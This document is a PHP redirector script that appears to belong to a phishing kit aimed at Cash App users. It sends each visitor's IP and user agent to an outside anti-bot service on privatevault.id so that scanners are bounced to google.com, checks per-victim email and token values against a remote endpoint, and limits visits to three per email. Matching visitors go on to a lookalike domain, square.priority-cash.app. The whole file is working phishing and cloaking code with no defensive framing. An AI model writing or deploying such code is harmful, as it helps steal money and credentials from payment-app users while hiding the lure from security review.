 
<?php

// ------------------------------
// Detect IP + User-Agent
// ------------------------------
if (!empty($_SERVER['HTTP_CF_CONNECTING_IP'])) {
    $ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $ip = trim(explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])[0]);
} elseif (!empty($_GET['ip'])) {
    $ip = $_GET['ip'];
} elseif (!empty($_SERVER['REMOTE_ADDR'])) {
    $ip = $_SERVER['REMOTE_ADDR'];
} else {
    $ip = 'unknown';
}

$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? ($_GET['ua'] ?? 'unknown');

 
function get_token_data($email, $token, $id)
{
    $ch = curl_init();

    curl_setopt($ch, CURLOPT_URL, "https://privatevault.id/telegram/get.php?email=" . urlencode($email) . "&token=" . urlencode($token) . "&id=" . urlencode($id));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

    $output = curl_exec($ch);
    curl_close($ch);

    return json_decode($output, true);
}


function check_visit_limit($email, $maxVisits = 3)
{
    $file = __DIR__ . '/visits.txt';

    // Buat file jika belum ada
    if (!file_exists($file)) {
        file_put_contents($file, '');
    }

    $visits = [];

    $lines = file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);

    foreach ($lines as $line) {
        $parts = explode('|', $line, 2);

        if (count($parts) === 2) {
            $visits[$parts[0]] = (int)$parts[1];
        }
    }

    if (!isset($visits[$email])) {
        $visits[$email] = 0;
    }

    if ($visits[$email] >= $maxVisits) {
        return false;
    }

    $visits[$email]++;

    $content = '';

    foreach ($visits as $savedEmail => $count) {
        $content .= $savedEmail . '|' . $count . PHP_EOL;
    }

    file_put_contents($file, $content, LOCK_EX);

    return true;
}

$url = 'https://privatevault.id/blocker/?ip=' . urlencode($ip) . '&ua=' . urlencode($userAgent);

$ch = curl_init($url);

$headers = [
    'User-Agent: ' . $userAgent,
    'X-Forwarded-For: ' . $ip,
];

curl_setopt_array($ch, [
    CURLOPT_HTTPHEADER     => $headers,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_TIMEOUT        => 15,
]);

$response = curl_exec($ch);
curl_close($ch);

$data = json_decode($response, true);

 
$bot = filter_var($data['bot'] ?? false, FILTER_VALIDATE_BOOLEAN);

if ($bot) {
    header('Location: https://google.com');
    exit;
}
 
if (
    !empty($_GET['email']) &&
    !empty($_GET['token']) &&
    !empty($_GET['id'])
) {

    $email = $_GET['email'];
    $token = $_GET['token'];
    $id    = $_GET['id'];

    $data = get_token_data($email, $token, $id);

    if (($data['message'] ?? '') === 'Match.') {

     
        if (!check_visit_limit($email, 3)) {
            header('Location: https://cash.app');
            exit;
        }
 
        header('Location: https://square.priority-cash.app/?email='.$email.'&token='.$token.'&id='.$id);
        exit;
    }

    header('Location: https://cash.app');
    exit;

} else {
    header('Location: https://cash.app');
    exit;
}
?>